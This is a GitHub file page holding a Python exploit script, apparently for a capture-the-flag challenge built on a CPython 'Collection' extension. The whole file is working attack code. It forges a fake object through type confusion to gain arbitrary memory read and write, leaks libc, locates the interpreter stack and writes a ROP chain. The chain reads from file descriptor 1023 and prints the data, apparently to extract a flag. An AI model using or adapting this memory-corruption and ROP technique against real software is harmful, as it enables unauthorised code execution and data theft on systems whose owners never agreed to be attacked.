Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
128 lines (105 sloc) 3.15 KB
offset_program_name = 0x3ec508
offset_libc = 0x408680
roots = []
def read(addr):
d = {}
d["a1"] = 0x1
d["a2"] = 0x9d3340
d["a3"] = 0x4
d["a4"] = addr
d["a5"] = 0x4
d["a6"] = 0x715620
d["a7"] = 0x0
d["a8"] = 0x0
# 0x7ffff6153db0: 0x0000000000000001 0x00000000009ef7a0
# 0x7ffff6153dc0: 0x0000000000000004 0x00007ffff6191790
# 0x7ffff6153dd0: 0x0000000000000004 0x0000000000644a50
# 0x7ffff6153de0: 0x0000000000000000 0x0000000000000000
fakeContainer = Collection.Collection(d)
collAddr = id(fakeContainer)
fakeArr = collAddr + 24
a = Collection.Collection({"a":1337, "b":[1.2]})
b = Collection.Collection({"b":[1.3], "a":fakeArr})
fakeobj = b.get("b")
roots.append(fakeobj)
return fakeobj[0]
def write(addr, val):
d = {}
d["a1"] = 0x1
d["a2"] = 0x9d3340
d["a3"] = 0x4
d["a4"] = addr
d["a5"] = 0x4
d["a6"] = 0x715620
d["a7"] = 0x0
d["a8"] = 0x0
# 0x7ffff6153db0: 0x0000000000000001 0x00000000009ef7a0
# 0x7ffff6153dc0: 0x0000000000000004 0x00007ffff6191790
# 0x7ffff6153dd0: 0x0000000000000004 0x0000000000644a50
# 0x7ffff6153de0: 0x0000000000000000 0x0000000000000000
fakeContainer = Collection.Collection(d)
collAddr = id(fakeContainer)
fakeArr = collAddr + 24
a = Collection.Collection({"a":1337, "b":[1.2]})
b = Collection.Collection({"b":[1.3], "a":fakeArr})
fakeobj = b.get("b")
roots.append(fakeobj)
fakeobj[0] = val
dl_runtime = read(0x9b3010)
print("dl_runtime at 0x%x" % dl_runtime)
libc = dl_runtime - offset_libc
print("libc at 0x%x" % libc)
program_name = libc + offset_program_name
print("program name at 0x%x" % program_name)
stack = read(program_name)
stack = stack + (8 - (stack % 8))
backup_stack = stack
stack -= 0x800
print("stack at 0x%x" % stack)
program_range = [0x400000, 0x7be000]
offset_libc_start_main = 0x21ab0
needle = 0x0000000000506393
def isInProgramRange(v):
return v >= program_range[0] and v < program_range[1]
for i in range(0x500):
stack -= 8
val = read(stack)
if needle == val:
print("GOT NEEDLE AT 0x%x" % stack)
break
#[#7] 0x506393 PyEval_EvalCode()
#[#8] 0x634d52 sub QWORD PTR [rbx], 0x1
#[#9] 0x634e0a PyRun_FileExFlags()
pop_rdi = libc + 0x2155f
pop_rsi = libc + 0x23e6a
pop_rdx = libc + 0x1b96
pop_rax = libc + 0x439c8
syscall_ret = libc + 0xd2975
write(backup_stack, backup_stack + 16) # iovec structure
write(backup_stack + 8, 0x44)
# readv(1023, iovec, 1)
write(stack, pop_rdi)
write(stack + 8, 0x00000000000003ff) # fd
write(stack + 16, pop_rsi)
write(stack + 24, backup_stack) # iovec
write(stack + 32, pop_rdx)
write(stack + 40, 1) # iocnt
write(stack + 48, pop_rax)
write(stack + 56, 19) # readv
write(stack + 64, syscall_ret)
stack += 72
write(stack, pop_rdi)
write(stack + 8, 1) # fd
write(stack + 16, pop_rsi)
write(stack + 24, backup_stack + 16) # buf
write(stack + 32, pop_rdx)
write(stack + 40, 44) # nbyte
write(stack + 48, pop_rax)
write(stack + 56, 1) # write
write(stack + 64, syscall_ret)
stack += 72
write(stack, pop_rdi)
write(stack + 8, 0) # statuscode
write(stack + 16, pop_rax)
write(stack + 24, 60) # exit
write(stack + 32, syscall_ret)